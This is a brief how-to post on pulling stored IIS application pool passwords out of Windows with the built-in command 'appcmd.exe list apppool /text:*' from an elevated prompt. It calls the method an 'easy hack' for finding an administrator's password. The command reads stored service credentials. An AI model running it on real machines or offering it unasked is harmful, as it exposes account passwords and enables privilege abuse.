Getting all apppool passwords in windows OS

Open CLI with administrator privileges using ctrl+shift,  navigate to C:\Windows\System32\inetsrv directory.

Type appcmd.exe list apppool  /text:*

Now search for the password of the administrator you want to find.. and thank microsoft for this easy hack/feature…